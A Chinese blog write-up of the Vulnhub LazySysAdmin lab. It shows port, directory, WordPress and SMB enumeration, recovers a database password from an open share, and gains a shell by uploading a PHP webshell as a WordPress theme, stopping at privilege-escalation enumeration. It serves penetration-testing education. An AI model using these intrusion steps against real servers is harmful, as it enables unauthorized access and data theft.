Vulnhub之Lazysysadmin

vulnhub

字数统计: 2k阅读时长: 10 min

 2019/01/04   Share

0x00 前言

The story of a lonely and lazy sysadmin who cries himself to sleep

Teaching newcomers the basics of Linux enumeration

Myself, I suck with Linux and wanted to learn more about each service whilst creating a playground for others to learn

0x01 靶机地址

传送门：https://www.vulnhub.com/entry/lazysysadmin-1,205

0x02 环境搭建

靶机：192.168.2.104(通过nmap扫描得到)
攻击机win：192.168.2.107
攻击机Kali：192.168.2.156

0x03 Play

1.信息收集

端口扫描

nmap -sS -A -p- -v -T4 192.168.2.104

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info:
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.2.156
|_  error: Closing link: (nmap@192.168.2.156) [Client exited]

目录扫描

dirb http://192.168.2.104/ -r

==> DIRECTORY: http://192.168.2.104/apache/                                     
+ http://192.168.2.104/index.html (CODE:200|SIZE:36072)                         
+ http://192.168.2.104/info.php (CODE:200|SIZE:77257)                           
==> DIRECTORY: http://192.168.2.104/javascript/                                 
==> DIRECTORY: http://192.168.2.104/old/                                        
==> DIRECTORY: http://192.168.2.104/phpmyadmin/                                 
+ http://192.168.2.104/robots.txt (CODE:200|SIZE:92)                            
+ http://192.168.2.104/server-status (CODE:403|SIZE:293)                        
==> DIRECTORY: http://192.168.2.104/test/                                       
==> DIRECTORY: http://192.168.2.104/wordpress/                                  
==> DIRECTORY: http://192.168.2.104/wp/

发现了一个wp和phpmyadmin的目录，外加有几个目录穿越漏洞的目录，但是并没啥用。

2.漏洞探测

打开wp主页面

反复强调这个togie，说明可能是个用户名，然后利用wpscan进行检测漏洞。

root@kali:~# wpscan http://192.168.2.104/wordpress/
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.2.104/wordpress/
[+] Started: Sun Jan 27 16:07:02 2019

[!] The WordPress 'http://192.168.2.104/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://192.168.2.104/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22
[!] Registration is enabled: http://192.168.2.104/wordpress/wp-login.php?action=register
[+] XML-RPC Interface available under: http://192.168.2.104/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.2.104/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.2.104/wordpress/wp-includes/

[+] WordPress version 4.8.8 (Released on 2018-12-13) identified from meta generator, links opml

[+] WordPress theme in use: twentyfifteen - v1.8

[+] Name: twentyfifteen - v1.8
|  Last updated: 2019-01-09T00:00:00.000Z
|  Location: http://192.168.2.104/wordpress/wp-content/themes/twentyfifteen/
|  Readme: http://192.168.2.104/wordpress/wp-content/themes/twentyfifteen/readme.txt
[!] The version is out of date, the latest version is 2.3
|  Style URL: http://192.168.2.104/wordpress/wp-content/themes/twentyfifteen/style.css
|  Theme Name: Twenty Fifteen
|  Theme URI: https://wordpress.org/themes/twentyfifteen/
|  Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...
|  Author: the WordPress team
|  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Sun Jan 27 16:07:07 2019
[+] Requests Done: 373
[+] Memory used: 40.688 MB
[+] Elapsed time: 00:00:04

但是并没有扫到高危漏洞可以getshell的，然后把方向对准445、139端口的Samba

root@kali:~# enum4linux 192.168.2.104
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jan 27 16:26:50 2019

==========================
|    Target Information    |
==========================
Target ........... 192.168.2.104
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


=====================================================
|    Enumerating Workgroup/Domain on 192.168.2.104    |
=====================================================
[+] Got domain/workgroup name: WORKGROUP

=============================================
|    Nbtstat Information for 192.168.2.104    |
=============================================
Looking up status of 192.168.2.104
    LAZYSYSADMIN    <00> -         B <ACTIVE>  Workstation Service
    LAZYSYSADMIN    <03> -         B <ACTIVE>  Messenger Service
    LAZYSYSADMIN    <20> -         B <ACTIVE>  File Server Service
    WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
    WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

    MAC Address = 00-00-00-00-00-00

======================================
|    Session Check on 192.168.2.104    |
======================================
[+] Server 192.168.2.104 allows sessions using username '', password ''

============================================
|    Getting domain SID for 192.168.2.104    |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

=======================================
|    OS information on 192.168.2.104    |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.2.104 from smbclient:
[+] Got OS info for 192.168.2.104 from srvinfo:
    LAZYSYSADMIN   Wk Sv PrQ Unx NT SNT Web server
    platform_id     :    500
    os version      :    6.1
    server type     :    0x809a03

==============================
|    Users on 192.168.2.104    |
==============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

==========================================
|    Share Enumeration on 192.168.2.104    |
==========================================
WARNING: The "syslog" option is deprecated

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    share$          Disk      Sumshare
    IPC$            IPC       IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

    Server               Comment
    ---------            -------

    Workgroup            Master
    ---------            -------
    WORKGROUP            YOGA-PC

[+] Attempting to map shares on 192.168.2.104
//192.168.2.104/print$    Mapping: DENIED, Listing: N/A
//192.168.2.104/share$    Mapping: OK, Listing: OK
//192.168.2.104/IPC$    [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

发现了三个共享文件夹，并且账号密码都是空于是Windows下依次获得资源目录，得到网站源码

1
2
3

C:\Users\Yoga
$ net use g: \\192.168.2.104\share$
命令成功完成。

想法是，找到数据库账密然后登入phpmyadmin中，找到wp的user表，手动添加管理员账号和密码（加密后的密码可以自己本地搭建一个wp，然后数据库查看数据，把账号密码插入进去），进入后台拿shell

得到 Admin：TogieMYSQL12345^^一枚。然后登录phpmyadmin,尝试写入一句话，没权限失败了，并且查看和修改任何数据也都报错 0.0

但是利用该账密登录wp后台成功了

3.Getshell

本地新建一个文件夹，将一个一句话木马放进去，然后将该文件夹压缩成wp.zip文件，然后在更新主题处上传

然后此时，在刚刚的共享资源中找到了，已经解压好的文件的路径K:\wordpress\wp-content\upgrade\wp\wp菜刀连接

4.提权

查看发行版本和内核版本

[/var/www/html/wordpress/wp-content/upgrade/wp-2/wp/]$ uname -a
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux


[/var/www/html/wordpress/wp-content/upgrade/wp-2/wp/]$ cat /etc/os-release
NAME="Ubuntu"
VERSION="14.04.5 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.5 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"